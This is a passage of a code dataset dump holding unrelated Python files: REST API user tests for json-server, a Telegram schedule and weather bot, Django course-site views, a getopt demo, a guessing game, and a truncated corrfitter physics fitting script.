{\n \"name\": fake.company(),\n \"catchPhrase\": fake.catch_phrase() if hasattr(fake, 'catch_phrase') else None,\n \"bs\": fake.bs() if hasattr(fake, 'bs') else None\n }\n }\n\n def __get_full_user_en(self):\n return self.__get_full_user(self.fake)\n\n def __get_full_user_localized(self):\n return self.__get_full_user(Factory.create('zh_CN'))\n\n def test_create_user(self):\n \"\"\" Positive test on create user \"\"\"\n for case, json in (('User with minimal data', self.__get_minimal_user()),\n ('User with all data', self.__get_full_user_en()),\n ('User with data in not-ASCII locale', self.__get_full_user_localized())):\n def test():\n prev = users.get()\n users.post(json)\n now = users.get()\n assert_equals(len(prev) + 1, len(now),\n case + \": Users count should increase by 1, \"\n \"was %d but now %s\" % (len(prev), len(now)))\n user_id = now[-1].get('id')\n assert_is_not_none(user_id, case + \": Created record should have id\")\n json.update(id=user_id)\n assert_dict_equal(json, now[-1],\n case + \": Data of the last record should be equal to the data sent + id, \"\n \"sent %s but got %s\" % (json, now[-1]))\n yield test\n\n def test_list_users(self):\n \"\"\" Test that we can get user list \"\"\"\n user_list = users.get()\n assert_is_instance(user_list, list,\n \"Data should be a list but got %s\" % user_list)\n\n def test_filter_by_name(self):\n \"\"\" Test filtering user by name field \"\"\"\n user = self.__get_full_user_en()\n users.post(user)\n search_name = user['name']\n user_list = users.get(name=search_name)\n assert_true(len(user_list) >= 1, \"At least one record should be returned, \"\n \"but got %s\" % user_list)\n for user2 in user_list:\n assert_true(search_name in user2['name'], \"Got user that does not match search \"\n \"name (%s): %s\" % (search_name, user2))\n last_user = max(user_list, key=lambda user: user['id'])\n user.update(id=last_user['id'])\n assert_dict_equal(user, last_user, \"Data of the last record should be equal to \"\n \"data sent + id, sent %s but got %s\" % (user, last_user))\n\n def test_filter_by_email(self):\n \"\"\" Test filtering user by email field \"\"\"\n user = self.__get_full_user_en()\n users.post(user)\n search_email = user['email']\n user_list = users.get(email=search_email)\n assert_true(len(user_list) >= 1, \"At least one user should be returned, but got %s\"\n % user_list)\n for user2 in user_list:\n assert_true(search_email in user2['email'], \"Got user that does not match search \"\n \"email (%s): %s\" % (search_email, user2))\n last_user = max(user_list, key=lambda user: user['id'])\n user.update(id=last_user['id'])\n assert_dict_equal(user, last_user, \"Data of the last record should be equal to \"\n \"data sent + id, sent %s but got %s\" % (user, last_user))\n\n def test_filter_by_phone(self):\n \"\"\" Test filtering user by phone field \"\"\"\n user = self.__get_full_user_en()\n users.post(user)\n search_phone = user['phone']\n user_list = users.get(phone=search_phone)\n assert_true(len(user_list) >= 1, \"At least one user should be returned, but got %s\"\n % user_list)\n for user2 in user_list:\n assert_true(search_phone in user2['phone'], \"Got user that does not match search phone \"\n \"(%s): %s\" % (search_phone, user2))\n last_user = max(user_list, key=lambda user: user['id'])\n user.update(id=last_user['id'])\n assert_dict_equal(user, last_user, \"Data of the last record should be equal to \"\n \"data sent + id, sent %s but got %s\" % (user, last_user))\n\n def test_filer_by_zipcode(self):\n \"\"\" Test filtering user by 
zipcode (inner field) \"\"\"\n user = self.__get_full_user_en()\n users.post(user)\n search_zipcode = user['address']['zipcode']\n user_list = users.get(**{'address.zipcode': search_zipcode})\n assert_true(len(user_list) >= 1, \"At least one user should be returned, but got %s\"\n % user_list)\n for user2 in user_list:\n assert_true(search_zipcode in user2['address']['zipcode'], \"Got user that does not \"\n \"match search zipcode (%s): %s\"\n % (search_zipcode, user2))\n last_user = max(user_list, key=lambda user: user['id'])\n user.update(id=last_user['id'])\n assert_dict_equal(user, last_user, \"Data of the last record should be equal to \"\n \"data sent + id, sent %s but got %s\" % (user, last_user))\n\n def test_filter_by_name_and_email(self):\n \"\"\" Test filtering user by two fields -last_user name and email \"\"\"\n user = self.__get_full_user_en()\n users.post(user)\n search_name = user['name']\n search_email = user['email']\n user_list = users.get(name=search_name, email=search_email)\n assert_true(len(user_list) >= 1, \"At least one user should be returned, but got %s\" % user_list)\n for user2 in user_list:\n assert_true(search_email in user2['email'] and search_name in user2['name'],\n \"Got user that does not match search email (%s) and name (%s): %s\"\n % (search_email, search_name, user2))\n last_user = max(user_list, key=lambda user: user['id'])\n user.update(id=last_user['id'])\n assert_dict_equal(user, last_user, \"Data of the last record should be equal to \"\n \"data sent + id, sent %s but got %s\" % (user, last_user))\n\n def test_full_text_search(self):\n \"\"\" Test full text search \"\"\"\n user = self.__get_full_user_en()\n users.post(user)\n for search_token in (user['name'].split()[0],\n user['name'].split()[1],\n user['email'].split('@')[0],\n user['company']['name'],\n user['address']['street'][:3]):\n def test():\n user_list = users.get(q=search_token)\n assert_true(len(user_list) >= 1, \"At least one user should be returned by token '%s', \"\n \"but got %s\" % (search_token, user_list))\n\n # test that no wrong users returned\n def flatten(x):\n return ''.join(flatten(i) if isinstance(i, dict) else unicode(i) for i in x.values())\n for user2 in user_list:\n user2_text = flatten(user2)\n assert_true(search_token.lower() in user2_text.lower(),\n \"User retrieved which does not contain search text (%s): %s\"\n % (search_token, user2))\n\n last_user = max(user_list, key=lambda user: user['id'])\n user.update(id=last_user['id'])\n assert_dict_equal(user, last_user, \"Data of the last record should be equal to \"\n \"data sent + id, sent %s but got %s\" % (user, last_user))\n yield test\n\n def test_filter_by_name_unicode(self):\n \"\"\" Test filter user by unicode name \"\"\"\n user = self.__get_full_user_localized()\n users.post(user)\n search_name = user['name']\n user_list = users.get(name=search_name)\n assert_true(len(user_list) >=1, \"At least one user should be found, but got %s\" % user_list)\n last_user = max(user_list, key=lambda user: user['id'])\n user.update(id=last_user['id'])\n assert_dict_equal(user, last_user, \"Data of the last record should be equal to the data sent + id, \"\n \"sent %s but got %s\" % (user, last_user))\n\n def test_full_text_search_unicode(self):\n \"\"\" Test full text search by unicode text \"\"\"\n user = self.__get_full_user_localized()\n users.post(user)\n search_token = user['name'][:2]\n user_list = users.get(q=search_token)\n assert_true(len(user_list) >= 1, \"At least one user should be found, got %s\" % user_list)\n 
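# json-server assigns ids sequentially (see test_sequence_after_create_user_with_id below), so the record with the largest id is the one this test just created\n        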
last_user = max(user_list, key=lambda user: user['id'])\n user.update(id=last_user['id'])\n assert_dict_equal(user, last_user, \"Data of the last record shoud be equal to the data sent + id, \"\n \"sent %s but got %s\" % (user, last_user))\n\n def test_replace_user(self):\n \"\"\" Test replace user data by method PUT \"\"\"\n user = self.__get_full_user_en()\n users.post(user)\n user_list = users.get()\n old_user = max(user_list, key=lambda user: user['id'])\n user_id = old_user['id']\n new_user = self.__get_minimal_user()\n users.put(user_id, new_user)\n user_list = users.get()\n last_user = max(user_list, key=lambda user: user['id'])\n new_user.update(id=user_id)\n assert_dict_equal(new_user, last_user)\n\n def test_update_user(self):\n \"\"\" Test update user data by method PATCH\n note: for inner fields whole dict should be replaced (current behavior) \"\"\"\n user = self.__get_full_user_en()\n users.post(user)\n user_list = users.get()\n old_user = max(user_list, key=lambda user:user['id'])\n user_id = old_user['id']\n for new_json in ({'name': self.fake.name()},\n {'address': {'street': self.fake.street_name()}}):\n def test():\n users.patch(user_id, new_json)\n user_list = users.get()\n last_user = max(user_list, key=lambda user: user['id'])\n old_user.update(new_json)\n assert_dict_equal(old_user, last_user)\n yield test\n\n def test_delete_user(self):\n \"\"\" Test delete user by method DELETE \"\"\"\n user = self.__get_full_user_en()\n users.post(user)\n user_list = users.get()\n old_user = max(user_list, key=lambda user: user['id'])\n user_id = old_user['id']\n users.delete(user_id)\n new_user_list = users.get()\n assert_true(len(filter(lambda user: user['id'] == user_id, new_user_list)) == 0,\n \"Deleted user with id = %d should not be in the list\" % user_id)\n assert_equals(len(user_list) - 1, len(new_user_list),\n \"New user list should be shorter by 1 than list before deletion, \"\n \"was %d, now %d\" % (len(user_list), len(new_user_list)))\n\n def test_create_user_with_id(self):\n \"\"\" Test create user with id specified in request \"\"\"\n user = self.__get_full_user_en()\n user_list = users.get()\n user_id = max(user['id'] for user in user_list) + 1 if user_list else 1\n user.update(id=user_id)\n users.post(user)\n new_user_list = users.get()\n assert_equals(len(user_list) + 1, len(new_user_list),\n \"Users count should be increased by 1,\"\n \" was %d, now %d\" % (len(user_list), len(new_user_list)))\n assert_equals(user, new_user_list[-1],\n \"User should be created with the id passed, \"\n \"sent %s, created %s\" % (user, new_user_list[-1]))\n\n def test_sequence_after_create_user_with_id(self):\n \"\"\" Test that specifying id in request does not break id sequence for next users \"\"\"\n user = self.__get_full_user_en()\n user_list = users.get()\n user_id = max(user['id'] for user in user_list) + 2 if user_list else 2\n user.update(id=user_id)\n users.post(user)\n for _ in xrange(2):\n user = self.__get_full_user_en()\n users.post(user)\n user_list = users.get()\n new_user = user_list[-1]\n assert_not_equal(user_id, new_user['id'],\n \"New user should be created with new id, created with %s\" % user_id)\n user.update(id=new_user['id'])\n assert_dict_equal(user, new_user,\n \"New user should be created with the data sent, \"\n \"sent %s, created %s\" % (user, new_user))\n\n @attr(negative=True)\n def test_create_user_with_existing_id(self):\n \"\"\" Negative test on creation user with duplicate id \"\"\"\n user = self.__get_full_user_en()\n user_list = users.get()\n 
last_user = max(user_list, key=lambda user: user['id'])\n user_id = last_user['id']\n user.update(id=user_id)\n users.post(user)\n new_user_list = users.get()\n assert_equals(len(user_list), len(new_user_list),\n \"Users count should remain the same, \"\n \"was %d, now %d\" % (len(user_list), len(new_user_list)))\n new_user = filter(lambda user: user['id'] == user_id, user_list)[0]\n assert_equals(last_user, new_user,\n \"User with existing id should remain unchanged, \"\n \"was %s, now %s\" % (last_user, new_user))\n\n @attr(negative=True)\n @SkipTest\n def test_create_user_with_wrong_data(self):\n \"\"\" Test create user with wrong data (list instead of dict)\n This fails, I think this is a bug because this behavior resulting \n to broken json structure, filed https://github.com/typicode/json-server/issues/547\n \"\"\"\n user_list = users.get()\n users.post([{'foo': 'bar'}])\n new_user_list = users.get()\n assert_equals(len(user_list), len(new_user_list),\n \"User count should remain the same, \"\n \"was %d, now %d\" % (len(user_list), len(new_user_list)))\n\n @attr(negative=True)\n def test_replace_user_with_wrong_id(self):\n \"\"\" Negative test on replace user by method PUT with non-existent id \"\"\"\n user_list = users.get()\n user_id = max(user['id'] for user in user_list) + 1 if user_list else 1\n user = self.__get_minimal_user()\n users.put(user_id, user)\n new_user_list = users.get()\n assert_equals(len(user_list), len(new_user_list),\n \"Users count should remain unchanged, \"\n \"was %d, now %d\" % (len(user_list), len(new_user_list)))\n\n @attr(negative=True)\n def test_update_user_with_wrong_id(self):\n \"\"\" Negative test on update user by method PATCH with non-existent id \"\"\"\n user_list = users.get()\n user_id = max(user['id'] for user in user_list) + 1 if user_list else 1\n json = {'name': self.fake.name()}\n users.patch(user_id, json)\n new_user_list = users.get()\n assert_equals(len(user_list), len(new_user_list),\n \"Users count should remain unchanged, \"\n \"was %d, now %d\" % (len(user_list), len(new_user_list)))\n\n @attr(negative=True)\n def test_delete_user_with_wrong_id(self):\n \"\"\" Negative test on delete user by method DELETE with non-existent id \"\"\"\n user_list = users.get()\n user_id = max(user['id'] for user in user_list) + 1 if user_list else 1\n users.delete(user_id)\n new_user_list = users.get()\n assert_equals(len(user_list), len(new_user_list),\n \"Users count should remain unchanged, \"\n \"was %d, now %d\" % (len(user_list), len(new_user_list)))","sub_path":"tests/users-test.py","file_name":"users-test.py","file_ext":"py","file_size_in_byte":17083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"454926292","text":"#!/usr/bin/env python3\n\nimport os\nimport pyowm\nimport flask\nimport config\nimport telebot\nimport datetime\nimport requests\nfrom flask import request\nfrom telebot import types\nfrom bs4 import BeautifulSoup\n\nserver = flask.Flask(__name__)\nbot = telebot.TeleBot(config.telegram_token)\n\ndate = datetime.datetime.now()\nweek = datetime.date(date.year, date.month, date.day).isocalendar()[1] % 2\n\nschedule = {\"Понедельник\" : {1:\"8 00 Схемач(Л)\\n9 50 ТМО(Л)\\n11 40 Метрология(П)\\n13 45 Философия(П)\", \n 0:\"8 00 Схемач(Л)\\n9 50 ТМО(Л)\\n11 40 Метрология(П)\"},\n \"Вторник\" : {1:\"8 00 Физ-ра\\n9 50 АВС(Л)\\n11 40 Схемач(П)\", 0:\"8 00 Физ-рa\\n9 50 АВС(Л)\"},\n \"Среда\" : {1:\"9 50 Метрология(Л)\\n11 40 ОС(Л)\", 0:\"9 50 Метрология(Л)\\n11 40 ОС(Л)\"},\n 
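# inner dict key is the week parity computed above (isocalendar week number % 2): 1 for odd weeks, 0 for even weeks\n            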
\"Четверг\" : {1:\"8 00 Физ-ра\\n9 50 АВС(Л)\\n11 40 ОС(П)\\n\", 0:\"9 50 АВС(Л)\\n11 40 ОС(П)\\n13 45 философия(Л)\\n\"},\n \"Пятница\" : {1:\"Военка\", 0:\"Военка\"},\n \"Суббота\" : {1:\"8 00 ПВТ(П)\\n9 50 ПВТ(Л)\\n11 40 ТМО(П)\\n\", 0:\"8 00 ПВТ(П)\\n9 50 ПВТ(Л)\"},\n }\n@bot.message_handler(commands=[\"help\"])\ndef help(message):\n bot.send_message(message.chat.id, \"Доступные команды:\\n\" + \"/help - Информация\\n\" + \n \"/get - Посмотреть расписание\\n/weather - Посмотреть погоду\")\n\n@bot.message_handler(commands=[\"get\"])\ndef get(message):\n markup = types.ReplyKeyboardMarkup()\n markup.row(\"Понедельник\", \"Вторник\")\n markup.row(\"Среда\", \"Четверг\")\n markup.row(\"Пятница\", \"Суббота\")\n bot.send_message(message.chat.id, \"Выбери день:\", reply_markup=markup)\n\n@bot.message_handler(commands=[\"weather\"])\ndef weather(message):\n owm = pyowm.OWM(config.pyowm_token)\n observation = owm.weather_at_place(\"Novosibirsk\")\n weather = observation.get_weather()\n\n temp = weather.get_temperature(unit=\"celsius\")\n wind = weather.get_wind()\n bot.send_message(message.chat.id, \"Погода в Новосибирске\\nТемпература: \" + \n str(temp['temp']) + \" градуса\\n\" + \"Ветер: \" + str(wind['speed']) + \" м/с\")\n\n@bot.message_handler(commands=[\"music\"])\ndef music(message):\n r = requests.get(\"http://the-radio.ru/radio/europa-plus-r363\")\n soup = BeautifulSoup(r.content, \"html.parser\")\n tag = soup.find_all(\"span\", {\"class\":\"title\"})\n artists = []\n for link in tag:\n artists.append(link.find(\"a\").text)\n song = list(tag[0])\n song_name = str(artists[0]) + song[2]\n \n bot.send_message(message.chat.id, song_name)\n\n@bot.message_handler(content_types=[\"text\"])\ndef repeat_all_messages(message):\n if message.text in schedule:\n bot.send_message(message.chat.id, \"Неделя \" + str(week) + \"\\n\" + \n schedule[message.text][week], reply_markup=types.ReplyKeyboardHide(), parse_mode=\"HTML\")\n\n@server.route(\"/bot\", methods=['POST'])\ndef getMessage():\n bot.process_new_messages(\n [telebot.types.Update.de_json(request.stream.read().decode(\"utf-8\")).message\n ])\n return \"!\", 200\n\n@server.route(\"/\")\ndef webhook():\n bot.remove_webhook()\n bot.set_webhook(url=\"https://nailpwnz.herokuapp.com/bot\")\n return \"!\", 200\n\nserver.run(host=\"0.0.0.0\", port=os.environ.get('PORT', 5000))\n\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":3679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"161862364","text":"import json\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nfrom django.views.generic.base import View\nfrom operation.models import UserFavorite\nfrom courses.models import Course\nfrom .models import CourseOrg, CityDict, Teacher\nfrom django.shortcuts import render_to_response\nfrom .forms import UserAskForm\nfrom pure_pagination import Paginator, EmptyPage, PageNotAnInteger\nfrom django.db.models import Q\n\nclass IndexView(View):\n \"\"\"首页\"\"\"\n def get(self, request):\n\n some_courses = Course.objects.filter(is_banner=False)[:6]\n banner_courses = Course.objects.filter(is_banner=True)[:3]\n\n some_orgs = CourseOrg.objects.filter()[:25]\n return render(request, 'index.html', {\n 'some_courses': some_courses,\n 'banner_courses': banner_courses,\n 'some_orgs': some_orgs\n\n })\n\n\nclass OrgView(View):\n \"\"\"课程机构列表\"\"\"\n def get(self, request):\n all_orgs = CourseOrg.objects.all()\n host_orgs = 
all_orgs.order_by(\"-click_nums\")[:3]\n        all_cities = CityDict.objects.all()\n\n        search_keywords = request.GET.get('keywords', '')\n        if search_keywords:\n            all_orgs = all_orgs.filter(Q(name__icontains=search_keywords) |\n                                       Q(desc__icontains=search_keywords)\n                                       )\n\n        # filter by city\n        city_id = request.GET.get('city', \"\")\n        if city_id:\n            all_orgs = all_orgs.filter(city_id=int(city_id))\n\n        # filter by category\n        category = request.GET.get(\"ct\", \"\")\n        if category:\n            all_orgs = all_orgs.filter(category=category)\n\n        sort = request.GET.get(\"sort\", \"\")\n        if sort == \"student\":\n            all_orgs = all_orgs.order_by(\"-students\")\n        elif sort == \"courses\":\n            all_orgs = all_orgs.order_by(\"-course_nums\")\n\n        org_nums = all_orgs.count()\n\n        # paginate the organizations\n        try:\n            page = request.GET.get('page', 1)\n        except PageNotAnInteger:\n            page = 1\n        p = Paginator(all_orgs, 5, request=request)\n        orgs = p.page(page)\n\n        return render(request, \"org-list.html\", {\n            \"all_orgs\": orgs,\n            \"all_cities\": all_cities,\n            \"org_nums\": org_nums,\n            \"city_id\": city_id,\n            \"category\": category,\n            \"host_orgs\": host_orgs,\n            \"sort\": sort\n        })\n\nclass AddUserAskView(View):\n    def post(self, request):\n        userask_form = UserAskForm(request.POST)\n        if userask_form.is_valid():\n            # the form can be saved directly; no need to instantiate the model field by field\n            user_ask = userask_form.save(commit=True)\n            # ajax asynchronous operation, return json\n            # msg_dict = {}\n            return HttpResponse(json.dumps({'status':'success'}), content_type='application/json')\n        else:\n            return HttpResponse(json.dumps({'status':'fail', 'msg': '添加出错'}), content_type='application/json')\n\n\nclass OrgHomeView(View):\n    \"\"\"\n    Organization home page\n    \"\"\"\n    def get(self, request, org_id):\n        current_page = \"home\"\n        course_org = CourseOrg.objects.get(id=int(org_id))\n\n        has_fav = False\n        if request.user.is_authenticated():\n            if UserFavorite.objects.filter(user=request.user, fav_id=course_org.id, fav_type=2):\n                has_fav = True\n\n        all_courses = course_org.course_set.all()[:3]\n        all_teachers = course_org.teacher_set.all()[:1]\n        return render(request, 'org-detail-homepage.html', {\n            'all_courses': all_courses,\n            \"all_teachers\": all_teachers,\n            \"course_org\": course_org,\n            \"current_page\": current_page,\n            \"has_fav\": has_fav\n        })\n\n\n\nclass OrgCourseView(View):\n    \"\"\"\n    Organization course list page\n    \"\"\"\n    def get(self, request, org_id):\n        current_page = \"course\"\n        course_org = CourseOrg.objects.get(id=int(org_id))\n\n        has_fav = False\n        if request.user.is_authenticated():\n            if UserFavorite.objects.filter(user=request.user, fav_id=course_org.id, fav_type=2):\n                has_fav = True\n\n        all_courses = course_org.course_set.all()\n\n        # paginate the courses\n        try:\n            page = request.GET.get('page', 1)\n        except PageNotAnInteger:\n            page = 1\n        p = Paginator(all_courses, 15, request=request)\n        course = p.page(page)\n\n        return render(request, 'org-detail-course.html', {\n            'all_courses': course,\n            \"course_org\": course_org,\n            \"current_page\": current_page,\n            \"has_fav\": has_fav\n\n        })\n\n\nclass OrgDescView(View):\n    \"\"\"\n    Organization description page\n    \"\"\"\n\n    def get(self, request, org_id):\n        current_page = \"desc\"\n        course_org = CourseOrg.objects.get(id=int(org_id))\n\n        has_fav = False\n        if request.user.is_authenticated():\n            if UserFavorite.objects.filter(user=request.user, fav_id=course_org.id, fav_type=2):\n                has_fav = True\n\n        return render(request, 'org-detail-desc.html', {\n            \"course_org\": course_org,\n            \"current_page\": current_page,\n            \"has_fav\": has_fav\n\n        })\n\nclass OrgTeacherView(View):\n    \"\"\"\n    Organization teacher list page\n    \"\"\"\n    def get(self, request, org_id):\n        current_page = \"teacher\"\n        course_org = 
CourseOrg.objects.get(id=int(org_id))\n        all_teachers = course_org.teacher_set.all()\n\n        # paginate the teachers\n        try:\n            page = request.GET.get('page', 1)\n        except PageNotAnInteger:\n            page = 1\n        p = Paginator(all_teachers, 5, request=request)\n        all_teachers = p.page(page)\n\n        has_fav = False\n        if request.user.is_authenticated():\n            if UserFavorite.objects.filter(user=request.user, fav_id=course_org.id, fav_type=2):\n                has_fav = True\n\n        return render(request, 'org-detail-teachers.html', {\n            'all_teachers': all_teachers,\n            \"course_org\": course_org,\n            \"current_page\": current_page,\n            \"has_fav\": has_fav\n\n        })\n\nclass AddFavView(View):\n    \"\"\"\n    Add and remove user favorites\n    \"\"\"\n    def post(self, request):\n        fav_id = request.POST.get(\"fav_id\", 0)\n        fav_type = request.POST.get(\"fav_type\", \"\")\n\n        # check whether the user is logged in\n        if not request.user.is_authenticated():\n            return HttpResponse(json.dumps({'status': 'fail', 'msg': '请先登录'}), content_type='application/json')\n\n        exit_records = UserFavorite.objects.filter(user=request.user, fav_id=int(fav_id), fav_type=fav_type)\n        # if the record already exists, cancel the favorite\n        if exit_records:\n            exit_records.delete()\n            return HttpResponse(json.dumps({'status': 'success', 'msg': '收藏'}), content_type='application/json')\n\n        else:\n            user_fav = UserFavorite()\n            if int(fav_id) > 0 and int(fav_type) > 0:\n                user_fav.user = request.user\n                user_fav.fav_id = int(fav_id)\n                user_fav.fav_type = int(fav_type)\n                user_fav.save()\n                return HttpResponse(json.dumps({'status': 'success', 'msg': '已收藏'}), content_type='application/json')\n\n            else:\n                return HttpResponse(json.dumps({'status': 'fail', 'msg': '收藏出错'}), content_type='application/json')\n\nclass TeacherListView(View):\n    \"\"\"Top-level teacher list page\"\"\"\n    def get(self, request):\n        all_teachers = Teacher.objects.all()\n\n        hot_teachers = Teacher.objects.all().order_by('-exp')\n        teacher_count = Teacher.objects.all().count()\n\n        sort = request.GET.get('sort', '')\n        if sort == 'hot':\n            all_teachers = Teacher.objects.all().order_by('-fans')\n\n        search_keywords = request.GET.get('keywords', '')\n        if search_keywords:\n            all_teachers = all_teachers.filter(Q(teacher_name__icontains=search_keywords) |\n                                               Q(teacher_desc__icontains=search_keywords)\n                                               )\n\n        # paginate the teachers\n        try:\n            page = request.GET.get('page', 1)\n        except PageNotAnInteger:\n            page = 1\n        p = Paginator(all_teachers, 5, request=request)\n        all_teachers = p.page(page)\n\n        return render(request, 'teacher-list.html', {\n            'all_teachers': all_teachers,\n            'hot_teachers': hot_teachers[:10],\n            'sort': sort,\n            'teacher_count': teacher_count\n        })\n\nclass TeacherDetailView(View):\n    \"\"\"Teacher detail page\"\"\"\n    def get(self, requests, teacher_id):\n        teacher = Teacher.objects.get(id=int(teacher_id))\n\n        hot_teachers = Teacher.objects.all().order_by('-fans')\n\n        return render(requests, 'teacher-detail.html', {\n            'teacher': teacher,\n            'hot_teachers': hot_teachers[:5]\n        })","sub_path":"MxOnline/apps/organization/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
{"seq_id":"535904993","text":"import sys\nimport getopt\n\n\ndef usage():\n    # keep the usage text in sync with the options actually parsed below (-h/--help, -o/--output, -v)\n    return 'Usage: cli_opt_demo.py -o <output> | --output <output> [-v] [-h | --help]'\n\n\ndef run(arguments):\n    try:\n        opts, args = getopt.getopt(arguments, \"ho:v\", [\"help\", \"output=\"])\n        # The return value consists of two elements: the first is a list of (option, value) pairs; the second is the list of program arguments left after the option list was stripped (this is a trailing slice of args).\n    except getopt.GetoptError as err:\n        # print 
help information and exit:\n print(err) # will print something like \"option -a not recognized\"\n usage()\n sys.exit(2) # passing 2 for cli errors (0 is default and 1 is all other types of errors)\n\n output = None\n verbose = False\n for option, argument in opts:\n print(option)\n if option == \"-v\":\n verbose = True\n elif option in (\"-h\", \"--help\"):\n print(usage())\n sys.exit()\n elif option in (\"-o\", \"--output\"):\n output = argument\n else:\n assert False, \"unhandled option\"\n\n print(output)\n\n\nif __name__ == \"__main__\" :\n run(sys.argv[1:])","sub_path":"modules/cli_opt_demo.py","file_name":"cli_opt_demo.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"422848566","text":"import random\ny = random.randint(1,10)\nprint(y)\nnum = 0\ncount = 0\nwhile (num != y and count < 3):\n try:\n num = int(input('Please enter a number between 1 - 10: '))\n if y== num:\n print( \"Congratulation you guessed the right number\")\n elif abs(y-num) == 1:\n print(\"You are Hot\")\n count+=1\n print(\"count = \", count)\n elif abs(y-num) == 2:\n print(\"You are Warm\")\n count += 1\n print(\"count = \", count)\n else:\n print(\"You are Cold\")\n count += 1\n print(\"count = \", count)\n except:\n print(\"Invalid input, \", end=\" \")\n\n","sub_path":"randNgen2.py","file_name":"randNgen2.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"565040883","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.4 (3310)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/gpl/software/python/corrfitter/examples/etas-Ds.py\n# Compiled at: 2017-02-13 12:39:10\n# Size of source mod 2**32: 5325 bytes\nfrom __future__ import print_function\nimport collections, sys, h5py, gvar as gv, numpy as np, corrfitter as cf\nSHOWPLOTS = True\n\ndef main():\n data = make_data('etas-Ds.h5')\n fitter = cf.CorrFitter(models=make_models(), svdcut=1e-05)\n p0 = None\n for N in [1, 2, 3, 4]:\n print(30 * '=', 'nterm =', N)\n prior = make_prior(N)\n fit = fitter.lsqfit(data=data, prior=prior, p0=p0)\n print(fit.format(pstyle=None if N < 4 else 'v'))\n p0 = fit.pmean\n\n print_results(fit, prior, data)\n if SHOWPLOTS:\n fit.show_plots()\n test_fit(fitter, 'etas-Ds.h5')\n\n\ndef test_fit(fitter, datafile):\n \"\"\" Test the fit with simulated data \"\"\"\n gv.ranseed(98)\n print('\\nRandom seed:', gv.ranseed.seed)\n dataset = h5py.File(datafile)\n pexact = fitter.fit.pmean\n prior = fitter.fit.prior\n for spdata in fitter.simulated_pdata_iter(n=2, dataset=dataset, pexact=pexact):\n print('\\n============================== simulation')\n sfit = fitter.lsqfit(pdata=spdata, prior=prior, p0=pexact)\n print(sfit.format(pstyle=None))\n diff = {}\n for k in ['etas:a', 'etas:dE', 'Ds:a', 'Ds:dE', 'Vnn']:\n p_k = sfit.p[k].flat[0]\n pex_k = pexact[k].flat[0]\n print('{:>10}: fit = {} exact = {:<9.5} diff = {}'.format(k, p_k, pex_k, p_k - pex_k))\n diff[k] = p_k - pex_k\n\n print('\\nAccuracy of key parameters: ' + gv.fmt_chi2(gv.chi2(diff)))\n\n\ndef make_data(datafile):\n \"\"\" Read data from datafile and average it. \"\"\"\n dset = cf.read_dataset(datafile)\n return gv.dataset.avg_data(dset)\n\n\ndef make_models():\n \"\"\" Create models to fit data. 
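It builds two two-point correlators (etas, and Ds with an oscillating Dso partner) and two three-point correlators (T=15 and T=16), all with tmin=5 and tp=64. 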
\"\"\"\n tmin = 5\n tp = 64\n models = [\n cf.Corr2(datatag='etas', tp=tp, tmin=tmin, a='etas:a', b='etas:a', dE='etas:dE'),\n cf.Corr2(datatag='Ds', tp=tp, tmin=tmin, a=('Ds:a', 'Dso:a'), b=('Ds:a', 'Dso:a'), dE=('Ds:dE',\n 'Dso:dE')),\n cf.Corr3(datatag='3ptT15', T=15, tmin=tmin, a='etas:a', dEa='etas:dE', b=('Ds:a', 'Dso:a'), dEb=('Ds:dE',\n 'Dso:dE'), Vnn='Vnn', Vno='Vno'),\n cf.Corr3(datatag='3ptT16', T=16, tmin=tmin, a='etas:a', dEa='etas:dE', b=('Ds:a', 'Dso:a'), dEb=('Ds:dE',\n 'Dso:dE'), tpb=tp, Vnn='Vnn', Vno='Vno')]\n return models\n\n\ndef make_prior(N):\n \"\"\" Create priors for fit parameters. \"\"\"\n prior = gv.BufferDict()\n metas = gv.gvar('0.4(2)')\n prior['log(etas:a)'] = gv.log(gv.gvar(N * ['0.3(3)']))\n prior['log(etas:dE)'] = gv.log(gv.gvar(N * ['0.5(5)']))\n prior['log(etas:dE)'][0] = gv.log(metas)\n mDs = gv.gvar('1.2(2)')\n prior['log(Ds:a)'] = gv.log(gv.gvar(N * ['0.3(3)']))\n prior['log(Ds:dE)'] = gv.log(gv.gvar(N * ['0.5(5)']))\n prior['log(Ds:dE)'][0] = gv.log(mDs)\n prior['log(Dso:a)'] = gv.log(gv.gvar(N * ['0.1(1)']))\n prior['log(Dso:dE)'] = gv.log(gv.gvar(N * ['0.5(5)']))\n prior['log(Dso:dE)'][0] = gv.log(mDs + gv.gvar('0.3(3)'))\n prior['Vnn'] = gv.gvar(N * [N * ['0(1)']])\n prior['Vno'] = gv.gvar(N * [N * ['0(1)']])\n return prior\n\n\ndef print_results(fit, prior, data):\n \"\"\" Report best-fit results. \"\"\"\n print('Fit results:')\n p = fit.p\n E_etas = np.cumsum(p['etas:dE'])\n a_etas = p['etas:a']\n print(' Eetas:', E_etas[:3])\n print(' aetas:', a_etas[:3])\n E_Ds = np.cumsum(p['Ds:dE'])\n a_Ds = p['Ds:a']\n print('\\n EDs:', E_Ds[:3])\n print(' aDs:', a_Ds[:3])\n E_Dso = np.cumsum(p['Dso:dE'])\n a_Dso = p['Dso:a']\n print('\\n EDso:', E_Dso[:3])\n print(' aDso:', a_Dso[:3])\n Vnn = p['Vnn']\n Vno = p['Vno']\n print('\\n etas->V->Ds =', Vnn[(0, 0)])\n print(' etas->V->Dso =', Vno[(0, 0)])\n outputs = collections.OrderedDict()\n outputs['metas'] = E_etas[0]\n outputs['mDs'] = E_Ds[0]\n outputs['mDso-mDs'] = E_Dso[0] - E_Ds[0]\n outputs['Vnn'] = Vnn[(0, 0)]\n outputs['Vno'] = Vno[(0, 0)]\n inputs = collections.OrderedDict()\n inputs['statistics'] = data\n inputs.update(prior)\n 